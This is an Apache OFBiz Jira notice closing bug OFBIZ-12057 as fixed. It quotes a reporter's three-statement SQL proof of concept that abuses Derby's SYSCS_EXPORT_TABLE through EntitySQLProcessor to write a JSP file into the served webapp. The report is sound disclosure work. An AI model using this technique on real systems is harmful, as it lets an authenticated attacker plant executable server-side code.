[
https://issues.apache.org/jira/browse/OFBIZ-12057?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]
Jacques Le Roux closed OFBIZ-12057.
-----------------------------------
Fix Version/s: 17.12.05
18.12.01
Resolution: Fixed
> Prevent arbitary file write using webtools/control/EntitySQLProcessor.
> ----------------------------------------------------------------------
>
> Key: OFBIZ-12057
> URL:
https://issues.apache.org/jira/browse/OFBIZ-12057> Project: OFBiz
> Issue Type: Sub-task
> Components: framework/webtools
> Affects Versions: Trunk
> Reporter: Jacques Le Roux
> Assignee: Jacques Le Roux
> Priority: Major
> Fix For: 18.12.01, 17.12.05
>
>
> Shuibo Ye <
[hidden email]> reported a possible arbitary file write using webtools/control/EntitySQLProcessor.
> {quote}
> In the "SQL Command" part, I create a table and insert some strings and export the table to a file *one sentence at a time*.
> PoC: CREATE TABLE "test" (string VARCHAR(80))
> INSERT INTO "test" (string) VALUES ('<%= system.getProperty("user.dir") %>')
> call SYSCS_UTIL.SYSCS_EXPORT_TABLE(null,'test','.\framework\webtools\webapp\webtools\default.jsp',null,'*',null)
> After executing the three sentences,I successfully write the file and its url is
https://localhost:8443/webtools/default.jsp.
> {quote}
> Note: this is a post-auth vuln., So we did not create a CVE
--
This message was sent by Atlassian Jira
(v8.3.4#803005)
Locked
